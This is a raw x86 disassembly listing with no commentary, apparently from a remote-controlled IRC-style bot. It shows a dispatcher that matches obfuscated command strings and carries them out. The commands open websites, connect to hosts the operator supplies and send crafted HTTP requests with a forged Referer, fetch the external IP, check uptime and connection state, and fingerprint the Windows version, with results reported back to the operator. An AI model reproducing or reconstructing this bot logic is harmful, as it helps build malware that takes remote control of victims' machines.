cmp eax, edi
mov dword_46D72C[ecx], eax
jz loc_412AB5
jmp short loc_412C7F
; ---------------------------------------------------------------------------
loc_412C77: ; CODE XREF: sub_40A9FE+8288�j
push 32h
call dword_437190 ; Sleep
loc_412C7F: ; CODE XREF: sub_40A9FE+8277�j
cmp [ebp+var_263C], 0
jz short loc_412C77
jmp loc_414995
; ---------------------------------------------------------------------------
loc_412C8D: ; CODE XREF: sub_40A9FE+814B�j
push dword ptr [ebx]
push offset aUpx0wCz2ei0qrn ; "UPx0W/cz2EI0QRn4z10ge1I1"
call edi ; dword_437178
test eax, eax
jnz short loc_412CBF
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push 0Eh
loc_412CA1: ; CODE XREF: sub_40A9FE+1D04�j
push 0
push [ebp+arg_20]
push [ebp+arg_18]
loc_412CA9: ; CODE XREF: sub_40A9FE+813B�j
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [esi+0Ch]
loc_412CB2: ; CODE XREF: sub_40A9FE+83�j
; sub_40A9FE+10A6�j
call sub_423654
loc_412CB7: ; CODE XREF: sub_40A9FE+4CA�j
; sub_40A9FE+2305�j
add esp, 20h
jmp loc_414995
; ---------------------------------------------------------------------------
loc_412CBF: ; CODE XREF: sub_40A9FE+829A�j
push dword ptr [ebx]
push offset aV6jbh0k4uD_ ; "V6jBH0k4u/d."
call edi ; dword_437178
test eax, eax
jnz loc_412D6A
mov ebx, [ebx+4]
test ebx, ebx
jz loc_412FC9
xor edi, edi
push edi
push edi
push ebx
push offset aIexplore ; "iexplore"
push offset aOpen ; "open"
push edi
call dword_43725C
test eax, eax
mov ebx, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
jz short loc_412D38
cmp [ebp+arg_14], 0
mov edi, offset aSSiteOpened_ ; "%s Site opened."
jnz short loc_412D1B
cmp [ebp+arg_18], 0
jnz short loc_412D25
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_412D1B: ; CODE XREF: sub_40A9FE+8305�j
cmp [ebp+arg_18], 0
jz loc_412FED
loc_412D25: ; CODE XREF: sub_40A9FE+830B�j
push ebx
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 10h
xor edi, edi
jmp short loc_412D56
; ---------------------------------------------------------------------------
loc_412D38: ; CODE XREF: sub_40A9FE+82FA�j
cmp [ebp+arg_14], edi
jnz short loc_412D56
cmp [ebp+arg_18], edi
jnz short loc_412D5F
push ebx
push offset aSSiteFailedToO ; "%s Site failed to open."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_412D56: ; CODE XREF: sub_40A9FE+8338�j
; sub_40A9FE+833D�j
cmp [ebp+arg_18], edi
jz loc_412FED
loc_412D5F: ; CODE XREF: sub_40A9FE+8342�j
push ebx
push offset aSSiteFailedToO ; "%s Site failed to open."
jmp loc_40BA60
; ---------------------------------------------------------------------------
loc_412D6A: ; CODE XREF: sub_40A9FE+82CC�j
push dword ptr [ebx]
push offset aB2smo_whkew_qr ; "B2smo.WHkeW.QRn4z10ge1I1"
call edi ; dword_437178
test eax, eax
jnz short loc_412DBD
push eax
push offset aIexplore_exe ; "iexplore.exe"
call sub_41FE3F
cmp [ebp+arg_14], 0
pop ecx
pop ecx
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
mov ebx, offset aSS_1 ; "%s %s"
jnz short loc_412DA9
push offset aBnjcz_zig1m0 ; "bNJcZ.ziG1m0"
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_412DA9: ; CODE XREF: sub_40A9FE+8394�j
cmp [ebp+arg_18], 0
jz loc_414995
push offset aBnjcz_zig1m0 ; "bNJcZ.ziG1m0"
jmp loc_40B0FA
; ---------------------------------------------------------------------------
loc_412DBD: ; CODE XREF: sub_40A9FE+8377�j
push dword ptr [ebx]
push offset aVxg7n_qbmg90aa ; "vXG7N.qBMG90aA/Td0EX07M1"
call edi ; dword_437178
test eax, eax
jnz loc_412FD3
cmp [ebx+4], eax
jz loc_412FC9
cmp [ebx+8], eax
jz loc_412FC9
cmp [ebx+0Ch], eax
jz loc_412FC9
cmp [ebx+10h], eax
jz loc_412FC9
lea eax, [ebp+var_7310]
push eax
push 101h
call dword_4372B8 ; WSAStartup
push dword ptr [ebx+4]
call dword_4372A4 ; gethostbyname
mov edi, eax
test edi, edi
jnz short loc_412E5A
cmp [ebp+arg_14], eax
mov edi, offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
mov ebx, offset aSSD ; "%s %s <%d>"
jnz short loc_412E3E
call dword_437170 ; RtlGetLastWin32Error
push eax
push edi
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_412E3E: ; CODE XREF: sub_40A9FE+8422�j
cmp [ebp+arg_18], 0
jz loc_414995
call dword_437170 ; RtlGetLastWin32Error
push eax
push edi
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
jmp loc_40B6FE
; ---------------------------------------------------------------------------
loc_412E5A: ; CODE XREF: sub_40A9FE+8413�j
push 6
push 1
push 2
call dword_4372BC ; socket
mov [ebp+arg_C], eax
mov [ebp+var_2F4], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_2F0], eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
call dword_4372C4 ; ntohs
mov [ebp+var_2F2], ax
lea eax, [ebp+var_2F4]
push 10h
push eax
push [ebp+arg_C]
call dword_4372CC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_412F13
push dword ptr [ebx+4]
lea eax, [ebp+var_31AC]
push dword ptr [ebx+14h]
push dword ptr [ebx+10h]
push dword ptr [ebx+0Ch]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\r\nReferer: %s\r\nUser-Agent"...
push 100h
push eax
call sub_429BBE
add esp, 1Ch
xor ebx, ebx
lea eax, [ebp+var_31AC]
push ebx
push eax
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_31AC]
push eax
push [ebp+arg_C]
call dword_4372D0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_412F13
push ebx
lea eax, [ebp+var_2DA4]
push 80h
push eax
push [ebp+arg_C]
call dword_4372D4 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_412F6E
loc_412F13: ; CODE XREF: sub_40A9FE+84AD�j
; sub_40A9FE+84F8�j
cmp [ebp+arg_14], 0
mov edi, offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
mov ebx, offset aSSD ; "%s %s <%d>"
jnz short loc_412F3F
call dword_437170 ; RtlGetLastWin32Error
push eax
push edi
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_412F3F: ; CODE XREF: sub_40A9FE+8523�j
cmp [ebp+arg_18], 0
jz short loc_412F60
call dword_437170 ; RtlGetLastWin32Error
push eax
push edi
loc_412F4D: ; DATA XREF: .text:off_44762C�o
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 18h
loc_412F60: ; CODE XREF: sub_40A9FE+8545�j
push [ebp+arg_C]
call dword_4372D8 ; closesocket
jmp loc_414995
; ---------------------------------------------------------------------------
loc_412F6E: ; CODE XREF: sub_40A9FE+8513�j
push [ebp+arg_C]
call dword_4372D8 ; closesocket
lea eax, [ebp+var_2DA4]
push offset asc_440D90 ; "\n"
push eax
call sub_429C5E
push eax
lea eax, [ebp+var_61860]
push eax
call sub_429B03
add esp, 10h
cmp [ebp+arg_14], ebx
mov edi, offset aS_5 ; "%s"
jnz short loc_412FB8
lea eax, [ebp+var_61860]
push eax
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_412FB8: ; CODE XREF: sub_40A9FE+85A2�j
cmp [ebp+arg_18], ebx
jz short loc_412FED
lea eax, [ebp+var_61860]
push eax
jmp loc_40BA5F
; ---------------------------------------------------------------------------
loc_412FC9: ; CODE XREF: sub_40A9FE+7EC8�j
; sub_40A9FE+7ED1�j ...
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
jmp loc_40BF10
; ---------------------------------------------------------------------------
loc_412FD3: ; CODE XREF: sub_40A9FE+83CA�j
push dword ptr [ebx]
push offset aQ5l5f_2to_60 ; "q5l5f.2TO.60"
call edi ; dword_437178
test eax, eax
jz short loc_412FF4
push dword ptr [ebx]
push offset aJbkl4Fbwcf1 ; "jBKL4/FbWCF1"
call edi ; dword_437178
test eax, eax
jz short loc_412FF4
loc_412FED: ; CODE XREF: sub_40A9FE+101D�j
; sub_40A9FE+105A�j ...
xor eax, eax
jmp loc_414998
; ---------------------------------------------------------------------------
loc_412FF4: ; CODE XREF: sub_40A9FE+85E0�j
; sub_40A9FE+85ED�j
xor eax, eax
cmp [ebx+4], eax
jz loc_413C78
cmp [ebx+8], eax
jz loc_413C78
push dword ptr [ebx]
and [ebp+arg_C], eax
and [ebp+arg_68], eax
mov [ebp+arg_8], 3
push offset aQ5l5f_2to_60 ; "q5l5f.2TO.60"
call edi ; dword_437178
test eax, eax
jnz short loc_413029
mov [ebp+arg_C], 1
loc_413029: ; CODE XREF: sub_40A9FE+8622�j
push dword ptr [ebx]
push offset aJbkl4Fbwcf1 ; "jBKL4/FbWCF1"
call edi ; dword_437178
test eax, eax
jnz short loc_41303D
mov [ebp+arg_68], 1
loc_41303D: ; CODE XREF: sub_40A9FE+8636�j
push dword ptr [ebx+4]
push offset aW3gp6_13acy1_0 ; "W3GP6.13AcY1"
call edi ; dword_437178
test eax, eax
jnz loc_413126
cmp [ebp+arg_C], eax
jz short loc_4130BA
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_413091
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_413091
mov ecx, [ebp+arg_10]
call sub_41DB58
push eax
push dword ptr [ebx+8]
call edi ; dword_437178
test eax, eax
jz short loc_4130BA
jmp loc_414995
; ---------------------------------------------------------------------------
loc_413091: ; CODE XREF: sub_40A9FE+8667�j
; sub_40A9FE+867A�j
mov ecx, [ebp+arg_10]
call sub_41DB58
push eax
call sub_42AF20
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42AF20
pop ecx
push eax
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jz loc_414995
loc_4130BA: ; CODE XREF: sub_40A9FE+8654�j
; sub_40A9FE+868C�j
cmp [ebp+arg_68], 0
jz short loc_413126
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4130FD
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4130FD
mov ecx, [ebp+arg_10]
call sub_41DB58
push eax
push dword ptr [ebx+8]
call edi ; dword_437178
test eax, eax
jnz short loc_413126
jmp loc_414995
; ---------------------------------------------------------------------------
loc_4130FD: ; CODE XREF: sub_40A9FE+86D3�j
; sub_40A9FE+86E6�j
mov ecx, [ebp+arg_10]
call sub_41DB58
push eax
call sub_42AF20
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42AF20
pop ecx
push eax
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jnz loc_414995
loc_413126: ; CODE XREF: sub_40A9FE+864B�j
; sub_40A9FE+86C0�j ...
push dword ptr [ebx+4]
push offset aM08se_kt9td1 ; "M08SE.Kt9tD1"
call edi ; dword_437178
test eax, eax
jnz loc_413200
cmp [ebp+arg_C], eax
jz short loc_4131A3
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_41317A
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_41317A
mov ecx, [ebp+arg_10]
call sub_41DB5C
push eax
push dword ptr [ebx+8]
call edi ; dword_437178
test eax, eax
jz short loc_4131A3
jmp loc_414995
; ---------------------------------------------------------------------------
loc_41317A: ; CODE XREF: sub_40A9FE+8750�j
; sub_40A9FE+8763�j
mov ecx, [ebp+arg_10]
call sub_41DB5C
push eax
call sub_42AF20
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42AF20
pop ecx
push eax
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jz loc_414995
loc_4131A3: ; CODE XREF: sub_40A9FE+873D�j
; sub_40A9FE+8775�j
cmp [ebp+arg_68], 0
jz loc_413A99
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4131E1
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4131E1
mov ecx, [ebp+arg_10]
call sub_41DB5C
push eax
jmp loc_413A42
; ---------------------------------------------------------------------------
loc_4131E1: ; CODE XREF: sub_40A9FE+87C0�j
; sub_40A9FE+87D3�j
mov ecx, [ebp+arg_10]
call sub_41DB5C
push eax
loc_4131EA: ; CODE XREF: sub_40A9FE+8945�j
call sub_42AF20
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42AF20
pop ecx
push eax
jmp loc_413A58
; ---------------------------------------------------------------------------
loc_413200: ; CODE XREF: sub_40A9FE+8734�j
push dword ptr [ebx+4]
push offset a3eowx2ocng ; "3eowX/2OCnG/"
call edi ; dword_437178
test eax, eax
jnz loc_413348
push offset byte_454A54
push offset dword_457C40
call edi ; dword_437178
test eax, eax
jz short loc_413231
push offset dword_457C40
call sub_41E4C1
test eax, eax
pop ecx
jz short loc_4132A0
loc_413231: ; CODE XREF: sub_40A9FE+8822�j
xor eax, eax
cmp [ebp+arg_14], eax
jnz short loc_41325A
cmp [ebp+arg_18], eax
jnz short loc_413260
cmp [ebp+arg_20], eax
jz short loc_413277
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push offset aSTryingToGetEx ; "%s Trying to get external IP."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_41325A: ; CODE XREF: sub_40A9FE+8838�j
cmp [ebp+arg_18], 0
jz short loc_413277
loc_413260: ; CODE XREF: sub_40A9FE+883D�j
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push offset aSTryingToGetEx ; "%s Trying to get external IP."
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 10h
loc_413277: ; CODE XREF: sub_40A9FE+8842�j
; sub_40A9FE+8860�j
mov ecx, [ebp+arg_10]
call sub_41DB58
mov ecx, [ebp+arg_10]
push eax
call sub_41CF25
push 1388h
push eax
mov dword ptr [ebp+var_C+4], eax
call dword_43707C ; WaitForSingleObject
push dword ptr [ebp+var_C+4]
call dword_437044 ; CloseHandle
loc_4132A0: ; CODE XREF: sub_40A9FE+8831�j
cmp [ebp+arg_C], 0
jz short loc_413304
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4132DF
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4132DF
push offset dword_457C58
push dword ptr [ebx+8]
call edi ; dword_437178
test eax, eax
jz short loc_413304
jmp loc_414995
; ---------------------------------------------------------------------------
loc_4132DF: ; CODE XREF: sub_40A9FE+88B9�j
; sub_40A9FE+88CC�j
push offset dword_457C58
call sub_42AF20
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42AF20
pop ecx
push eax
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jz loc_414995
loc_413304: ; CODE XREF: sub_40A9FE+88A6�j
; sub_40A9FE+88DA�j
cmp [ebp+arg_68], 0
jz loc_413A99
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_41333E
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_41333E
push offset dword_457C58
jmp loc_413A42
; ---------------------------------------------------------------------------
loc_41333E: ; CODE XREF: sub_40A9FE+8921�j
; sub_40A9FE+8934�j
push offset dword_457C58
jmp loc_4131EA
; ---------------------------------------------------------------------------
loc_413348: ; CODE XREF: sub_40A9FE+880E�j
push dword ptr [ebx+4]
push offset aS3dyJzo6r ; "s3dY//JZo6r/"
call edi ; dword_437178
test eax, eax
jnz short loc_413381
cmp [ebp+arg_C], eax
jz short loc_41336D
push offset a3c9 ; "]&3c9"
push dword ptr [ebx+8]
call edi ; dword_437178
test eax, eax
jnz loc_414995
loc_41336D: ; CODE XREF: sub_40A9FE+895B�j
cmp [ebp+arg_68], 0
jz loc_413A99
push offset a3c9 ; "]&3c9"
jmp loc_413A42
; ---------------------------------------------------------------------------
loc_413381: ; CODE XREF: sub_40A9FE+8956�j
push dword ptr [ebx+4]
push offset aUwher1dagd80 ; "UWher1DAGD80"
call edi ; dword_437178
test eax, eax
jnz short loc_4133BA
cmp [ebp+arg_C], eax
jz short loc_4133A6
push offset dword_4439BC
push dword ptr [ebx+8]
call edi ; dword_437178
test eax, eax
jnz loc_414995
loc_4133A6: ; CODE XREF: sub_40A9FE+8994�j
cmp [ebp+arg_68], 0
jz loc_413A99
push offset dword_4439BC
jmp loc_413A42
; ---------------------------------------------------------------------------
loc_4133BA: ; CODE XREF: sub_40A9FE+898F�j
push dword ptr [ebx+4]
push offset aPnb_aBfzu60 ; "pNb.a/Bfzu60"
call edi ; dword_437178
test eax, eax
jnz short loc_4133D0
call dword_437188 ; GetTickCount
jmp short loc_41342F
; ---------------------------------------------------------------------------
loc_4133D0: ; CODE XREF: sub_40A9FE+89C8�j
push dword ptr [ebx+4]
push offset aZu2s6_o7_yt ; "Zu2s6.O7.yt/"
call edi ; dword_437178
test eax, eax
jnz short loc_41341C
call dword_437188 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov edi, 3E8h
push 3Ch
mov ecx, eax
mov eax, dword_457F60
div edi
xor edx, edx
sub ecx, eax
mov eax, ecx
mov ecx, 15180h
div ecx
mov ecx, 0E10h
mov eax, edx
xor edx, edx
div ecx
pop ecx
mov eax, edx
jmp short loc_413434
; ---------------------------------------------------------------------------
loc_41341C: ; CODE XREF: sub_40A9FE+89DE�j
push dword ptr [ebx+4]
push offset a4hftz6holr ; "4hftZ/6HOlR/"
call edi ; dword_437178
test eax, eax
jnz short loc_413471
call sub_41BCED
loc_41342F: ; CODE XREF: sub_40A9FE+89D0�j
mov ecx, 5265C00h
loc_413434: ; CODE XREF: sub_40A9FE+8A1C�j
xor edx, edx
div ecx
cmp [ebp+arg_C], 0
mov edi, eax
jz short loc_413451
push dword ptr [ebx+8]
call sub_42A100
cmp edi, eax
pop ecx
jb loc_414995
loc_413451: ; CODE XREF: sub_40A9FE+8A40�j
cmp [ebp+arg_68], 0
jz loc_413A99
push dword ptr [ebx+8]
call sub_42A100
cmp edi, eax
pop ecx
jbe loc_413A99
jmp loc_414995
; ---------------------------------------------------------------------------
loc_413471: ; CODE XREF: sub_40A9FE+8A2A�j
push dword ptr [ebx+4]
push offset aYqrdp_9rf4u0 ; "yqrdP.9rF4U0"
call edi ; dword_437178
test eax, eax
jnz short loc_4134B7
cmp [ebp+arg_C], eax
mov [ebp+arg_8], 2
jz short loc_41349E
push offset dword_457CF8
call sub_41E4C1
test eax, eax
pop ecx
jz loc_414995
loc_41349E: ; CODE XREF: sub_40A9FE+8A8B�j
cmp [ebp+arg_68], 0
jz loc_413A99
push offset dword_457CF8
call sub_41E4C1
jmp loc_413A5E
; ---------------------------------------------------------------------------
loc_4134B7: ; CODE XREF: sub_40A9FE+8A7F�j
push dword ptr [ebx+4]
push offset a1uyis15kh_n1 ; "1UyIs15KH.n1"
call edi ; dword_437178
test eax, eax
jnz short loc_4134FD
xor edi, edi
mov [ebp+arg_8], 2
cmp dword_457050, edi
jnz loc_414995
push edi
push edi
lea eax, [ebp+var_3C]
push edi
push eax
call dword_456DB4 ; InternetGetConnectedStateExA
test [ebp+var_3C], 1
jz short loc_4134F5
cmp [ebp+arg_68], edi
jmp loc_413A61
; ---------------------------------------------------------------------------
loc_4134F5: ; CODE XREF: sub_40A9FE+8AED�j
cmp [ebp+arg_C], edi
jmp loc_413A61
; ---------------------------------------------------------------------------
loc_4134FD: ; CODE XREF: sub_40A9FE+8AC5�j
push dword ptr [ebx+4]
push offset a9ljbh07crkd__0 ; "9lJBH07crkD."
call edi ; dword_437178
test eax, eax
jnz loc_4135FB
cmp [ebp+arg_C], eax
jz short loc_41357E
push dword ptr [ebx+8]
push offset aD0ron_ctdg0_ ; "D0roN.CTDg0."
call edi ; dword_437178
test eax, eax
jnz short loc_41357E
push 8
call sub_423800
test eax, eax
pop ecx
jz loc_414995
push dword ptr [ebx+8]
push offset aFr8ri0f9nfz_ ; "fr8ri0f9NfZ."
call edi ; dword_437178
test eax, eax
jnz short loc_41357E
push 0Dh
call sub_423800
test eax, eax
pop ecx
jz loc_414995
push dword ptr [ebx+8]
push offset aWbzcx0Dknt_ ; "wbZcx0/Dknt."
call edi ; dword_437178
test eax, eax
jnz short loc_41357E
push 8
call sub_423800
test eax, eax
pop ecx
jnz loc_414995
push 0Dh
call sub_423800
test eax, eax
pop ecx
jnz loc_414995
loc_41357E: ; CODE XREF: sub_40A9FE+8B14�j
; sub_40A9FE+8B22�j ...
cmp [ebp+arg_68], 0
jz loc_413A99
push dword ptr [ebx+8]
push offset aD0ron_ctdg0_ ; "D0roN.CTDg0."
call edi ; dword_437178
test eax, eax
jnz loc_413A99
push 8
call sub_423800
test eax, eax
pop ecx
jnz loc_414995
push dword ptr [ebx+8]
push offset aFr8ri0f9nfz_ ; "fr8ri0f9NfZ."
call edi ; dword_437178
test eax, eax
jnz loc_413A99
push 0Dh
call sub_423800
test eax, eax
pop ecx
jnz loc_414995
push dword ptr [ebx+8]
push offset aWbzcx0Dknt_ ; "wbZcx0/Dknt."
call edi ; dword_437178
test eax, eax
jnz loc_413A99
push 8
call sub_423800
test eax, eax
pop ecx
jnz loc_413A99
push 0Dh
call sub_423800
pop ecx
jmp loc_413A47
; ---------------------------------------------------------------------------
loc_4135FB: ; CODE XREF: sub_40A9FE+8B0B�j
push dword ptr [ebx+4]
push offset aNyjsr1cv5ch0 ; "NyJsR1cV5CH0"
call edi ; dword_437178
test eax, eax
jnz loc_4138FB
lea eax, [ebp+var_208]
mov [ebp+var_208], 94h
push eax
call dword_437050 ; GetVersionExA
test eax, eax
jz loc_413A99
cmp [ebp+arg_C], 0
jz loc_413796
push dword ptr [ebx+8]
push offset a95 ; "95"
call edi ; dword_437178
test eax, eax
jnz short loc_413669
cmp [ebp+var_204], 4
jnz loc_414995
cmp [ebp+var_200], eax
jnz loc_414995
cmp [ebp+var_1F8], 1
jmp loc_41376B
; ---------------------------------------------------------------------------
loc_413669: ; CODE XREF: sub_40A9FE+8C44�j
push dword ptr [ebx+8]
push offset aNt ; "nt"
call edi ; dword_437178
test eax, eax
jnz short loc_41369C
cmp [ebp+var_204], 4
jnz loc_414995
cmp [ebp+var_200], eax
jnz loc_414995
cmp [ebp+var_1F8], 2
jmp loc_41376B
; ---------------------------------------------------------------------------
loc_41369C: ; CODE XREF: sub_40A9FE+8C77�j
push dword ptr [ebx+8]
push offset a98 ; "98"
call edi ; dword_437178
test eax, eax
jnz short loc_4136C3
cmp [ebp+var_204], 4
jnz loc_414995
cmp [ebp+var_200], 0Ah
jmp loc_41376B
; ---------------------------------------------------------------------------
loc_4136C3: ; CODE XREF: sub_40A9FE+8CAA�j
push dword ptr [ebx+8]
push offset aMe ; "me"
call edi ; dword_437178
test eax, eax
jnz short loc_4136EA
cmp [ebp+var_204], 4
jnz loc_414995
cmp [ebp+var_200], 5Ah
jmp loc_41376B
; ---------------------------------------------------------------------------
loc_4136EA: ; CODE XREF: sub_40A9FE+8CD1�j
push dword ptr [ebx+8]
push offset a2k_0 ; "2k"
call edi ; dword_437178
test eax, eax
jnz short loc_413701
cmp [ebp+var_204], 5
jmp short loc_41375E
; ---------------------------------------------------------------------------
loc_413701: ; CODE XREF: sub_40A9FE+8CF8�j
push dword ptr [ebx+8]
push offset aXp_0 ; "xp"
call edi ; dword_437178
test eax, eax
jnz short loc_413725
cmp [ebp+var_204], 5
jnz loc_414995
cmp [ebp+var_200], 1
jmp short loc_41376B
; ---------------------------------------------------------------------------
loc_413725: ; CODE XREF: sub_40A9FE+8D0F�j
push dword ptr [ebx+8]
push offset a2k3 ; "2k3"
call edi ; dword_437178
test eax, eax
jnz short loc_413749
cmp [ebp+var_204], 5
jnz loc_414995
cmp [ebp+var_200], 2
jmp short loc_41376B
; ---------------------------------------------------------------------------
loc_413749: ; CODE XREF: sub_40A9FE+8D33�j
push dword ptr [ebx+8]
push offset aVista ; "vista"
call edi ; dword_437178
test eax, eax
jnz short loc_413772
cmp [ebp+var_204], 6
loc_41375E: ; CODE XREF: sub_40A9FE+8D01�j
jnz loc_414995
cmp [ebp+var_200], 0
loc_41376B: ; CODE XREF: sub_40A9FE+8C66�j
; sub_40A9FE+8C99�j ...
jz short loc_413796
jmp loc_414995
; ---------------------------------------------------------------------------
loc_413772: ; CODE XREF: sub_40A9FE+8D57�j
push dword ptr [ebx+8]
push offset a7 ; "7"
call edi ; dword_437178
test eax, eax
jnz short loc_413796
cmp [ebp+var_204], 6
jnz short loc_413796
inc eax
cmp [ebp+var_200], eax
jz loc_414998
loc_413796: ; CODE XREF: sub_40A9FE+8C32�j
; sub_40A9FE:loc_41376B�j ...
cmp [ebp+arg_68], 0
jz loc_413A99
push dword ptr [ebx+8]
push offset a95 ; "95"
call edi ; dword_437178
test eax, eax
jnz short loc_4137D3
cmp [ebp+var_204], 4
jnz loc_413A99
cmp [ebp+var_200], eax
jnz loc_413A99
cmp [ebp+var_1F8], 1
jmp loc_413A49
; ---------------------------------------------------------------------------
loc_4137D3: ; CODE XREF: sub_40A9FE+8DAE�j
push dword ptr [ebx+8]
push offset aNt ; "nt"
call edi ; dword_437178
test eax, eax
jnz short loc_413806
cmp [ebp+var_204], 4
jnz loc_413A99
cmp [ebp+var_200], eax
jnz loc_413A99
cmp [ebp+var_1F8], 2
jmp loc_413A49
; ---------------------------------------------------------------------------
loc_413806: ; CODE XREF: sub_40A9FE+8DE1�j
push dword ptr [ebx+8]
push offset a98 ; "98"
call edi ; dword_437178
test eax, eax
jnz short loc_41382D
cmp [ebp+var_204], 4
jnz loc_413A99
cmp [ebp+var_200], 0Ah
jmp loc_413A49
; ---------------------------------------------------------------------------
loc_41382D: ; CODE XREF: sub_40A9FE+8E14�j
push dword ptr [ebx+8]
push offset aMe ; "me"
call edi ; dword_437178
test eax, eax
jnz short loc_413854
cmp [ebp+var_204], 4
jnz loc_413A99
cmp [ebp+var_200], 5Ah
jmp loc_413A49
; ---------------------------------------------------------------------------
loc_413854: ; CODE XREF: sub_40A9FE+8E3B�j
push dword ptr [ebx+8]
push offset a2k_0 ; "2k"
call edi ; dword_437178
test eax, eax
jnz short loc_41387B
cmp [ebp+var_204], 5
loc_413869: ; CODE XREF: sub_40A9FE+8EE0�j
jnz loc_413A99
cmp [ebp+var_200], 0
jmp loc_413A49
; ---------------------------------------------------------------------------
loc_41387B: ; CODE XREF: sub_40A9FE+8E62�j
push dword ptr [ebx+8]
push offset aXp_0 ; "xp"
call edi ; dword_437178
test eax, eax
jnz short loc_4138A2
cmp [ebp+var_204], 5
loc_413890: ; CODE XREF: sub_40A9FE+8EFB�j
jnz loc_413A99
cmp [ebp+var_200], 1
jmp loc_413A49
; ---------------------------------------------------------------------------
loc_4138A2: ; CODE XREF: sub_40A9FE+8E89�j
push dword ptr [ebx+8]
push offset a2k3 ; "2k3"
call edi ; dword_437178
test eax, eax
jnz short loc_4138C9
cmp [ebp+var_204], 5
jnz loc_413A99
cmp [ebp+var_200], 2
jmp loc_413A49
; ---------------------------------------------------------------------------
loc_4138C9: ; CODE XREF: sub_40A9FE+8EB0�j
push dword ptr [ebx+8]
push offset aVista ; "vista"
call edi ; dword_437178
test eax, eax
jnz short loc_4138E0
cmp [ebp+var_204], 6
jmp short loc_413869
; ---------------------------------------------------------------------------
loc_4138E0: ; CODE XREF: sub_40A9FE+8ED7�j
push dword ptr [ebx+8]
push offset a7 ; "7"
call edi ; dword_437178
test eax, eax
jnz loc_413A99
cmp [ebp+var_204], 6
jmp short loc_413890
; ---------------------------------------------------------------------------
loc_4138FB: ; CODE XREF: sub_40A9FE+8C09�j
push dword ptr [ebx+4]
push offset aI6sd4ctzn0 ; "/I6sD/4CTzn0"
call edi ; dword_437178
test eax, eax
jnz loc_4139A6
cmp [ebp+arg_C], eax
jz short loc_413962
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_41394B
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_41394B
push offset dword_457CF8
push dword ptr [ebx+8]
call edi ; dword_437178
test eax, eax
jz short loc_413962
jmp loc_414995
; ---------------------------------------------------------------------------
loc_41394B: ; CODE XREF: sub_40A9FE+8F25�j
; sub_40A9FE+8F38�j
push offset dword_457CF8
push dword ptr [ebx+8]
